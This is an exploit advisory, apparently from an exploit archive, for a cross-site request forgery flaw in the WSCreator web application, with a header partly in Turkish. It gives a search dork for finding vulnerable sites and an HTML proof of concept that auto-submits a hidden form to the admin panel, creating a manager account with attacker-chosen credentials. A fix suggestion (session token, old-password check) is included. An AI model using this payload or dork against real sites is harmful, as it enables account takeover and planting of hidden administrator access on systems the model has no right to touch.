< ------------------- header data start ------------------- >

#############################################################

# Application Name : WSCreator

# Vulnerable Type : XSRF

# Infection : Uzaktan otomatik olarak admin pass change edilebilir.

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, eski sifre sorulmalidir.

# author : Bug Researchers

# Dork : Powered by WSCreator

#############################################################

< ------------------- header data end of ------------------- >



<b0dy onLoad=Submit();>
<script>function Submit[]{document.JoCk3r.submit();}</script>

<form onsubmit=’return ValidateAddNewUser(this)’ action=http://www.Site.com/[PATCH]/ADMIN/index.php method=post ENCTYPE=multipart/form-data name=JoCk3r ><input type=hidden name=category value=security><input type=hidden name=action value=nouveau><input type=hidden name=SpecialProcessAddForm>

<input type=hidden name=username size=20 value=JoCk3r>
<input type=hidden name=password size=20 value=JoCk3r>
<select name=type><option value=manager>
<input type=hidden name=telephone size=20 value=+9045454545>
<input type=hidden name=email size=20 value=[email protected]>

<input type=submit value=create name=B1>



< -- bug code end of -- >